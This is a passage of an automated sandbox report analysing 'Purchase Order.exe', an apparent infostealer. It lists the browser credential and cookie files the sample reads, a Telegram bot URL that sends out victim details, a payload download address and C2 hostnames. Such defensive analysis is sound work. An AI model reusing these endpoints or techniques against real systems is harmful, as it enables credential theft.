            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595365Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594985Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594860Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594735Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594610Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594235Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594110Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
            Source: Purchase Order.exe, 00000004.00000002.3364386866.0000000006318000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
            Source: Purchase Order.exe, 00000004.00000002.3364386866.0000000006354000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW81
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: C:\Users\user\Desktop\Purchase Order.exeAPI call chain: ExitProcess graph end nodegraph_0-4889
            Source: C:\Users\user\Desktop\Purchase Order.exeAPI call chain: ExitProcess graph end nodegraph_0-4896
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Users\user\Desktop\Purchase Order.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_00405F19 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405F19
            Source: C:\Users\user\Desktop\Purchase Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase Order.exe PID: 3340, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000004.00000002.3384062771.000000003692F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase Order.exe PID: 3340, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase Order.exe PID: 3340, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            11
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            1
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            3
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets4
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Purchase Order.exe5%ReversingLabs
            Purchase Order.exe12%VirustotalBrowse
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            http://checkip.dyndns.org0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            http://checkip.dyndns.org/0%URL Reputationsafe
            http://nsis.sf.net/NSIS_Error0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://reallyfreegeoip.org0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            reallyfreegeoip.org
            188.114.97.3
            truetrue
              unknown
              api.telegram.org
              149.154.167.220
              truetrue
                unknown
                checkip.dyndns.com
                193.122.130.0
                truefalse
                  unknown
                  checkip.dyndns.org
                  unknown
                  unknowntrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2021/10/2024%20/%2017:55:09%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                      unknown
                      http://84.38.129.16/efxSlCP242.binfalse
                        unknown
                        http://checkip.dyndns.org/false
                        • URL Reputation: safe
                        unknown
                        https://reallyfreegeoip.org/xml/155.94.241.186false
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://www.office.com/Purchase Order.exe, 00000004.00000002.3384062771.0000000036A17000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.3384062771.0000000036A08000.00000004.00000800.00020000.00000000.sdmpfalse
                            unknown
                            https://duckduckgo.com/chrome_newtabPurchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://duckduckgo.com/ac/?q=Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://api.telegram.orgPurchase Order.exe, 00000004.00000002.3384062771.0000000036915000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoPurchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://api.telegram.org/botPurchase Order.exe, 00000004.00000002.3384062771.0000000036915000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  http://84.38.129.16/efxSlCP242.binJPurchase Order.exe, 00000004.00000002.3364386866.0000000006354000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20aPurchase Order.exe, 00000004.00000002.3384062771.0000000036915000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      http://checkip.dyndns.orgPurchase Order.exe, 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://nsis.sf.net/NSIS_ErrorErrorPurchase Order.exe, 00000000.00000000.2111963143.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Purchase Order.exe, 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Purchase Order.exe, 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=Purchase Order.exe, 00000004.00000002.3384062771.0000000036915000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://chrome.google.com/webstore?hl=enPurchase Order.exe, 00000004.00000002.3384062771.000000003692F000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.3384062771.0000000036A17000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://www.ecosia.org/newtab/Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://reallyfreegeoip.org/xml/155.94.241.186$Purchase Order.exe, 00000004.00000002.3384062771.00000000368EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            http://varders.kozow.com:8081Purchase Order.exe, 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              http://aborters.duckdns.org:8081Purchase Order.exe, 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                https://ac.ecosia.org/autocomplete?q=Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://nsis.sf.net/NSIS_ErrorPurchase Order.exe, Purchase Order.exe, 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://www.office.com/pPurchase Order.exe, 00000004.00000002.3384062771.0000000036A08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://anotherarmy.dns.army:8081Purchase Order.exe, 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchPurchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://chrome.google.com/webstore?hl=enlBPurchase Order.exe, 00000004.00000002.3384062771.00000000369E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://reallyfreegeoip.orgPurchase Order.exe, 00000004.00000002.3384062771.000000003687A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.3384062771.00000000368EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://84.38.129.16/efxSlCP242.binnPurchase Order.exe, 00000004.00000002.3364386866.0000000006354000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePurchase Order.exe, 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://reallyfreegeoip.org/xml/Purchase Order.exe, 00000004.00000002.3384062771.000000003687A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        149.154.167.220
                                                        api.telegram.orgUnited Kingdom
                                                        62041TELEGRAMRUtrue
                                                        188.114.97.3
                                                        reallyfreegeoip.orgEuropean Union
                                                        13335CLOUDFLARENETUStrue
                                                        193.122.130.0
                                                        checkip.dyndns.comUnited States
                                                        31898ORACLE-BMC-31898USfalse
                                                        84.38.129.16
                                                        unknownLatvia
                                                        203557DATACLUB-NLfalse
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1538474
                                                        Start date and time:2024-10-21 11:28:07 +02:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 7m 53s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:5
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
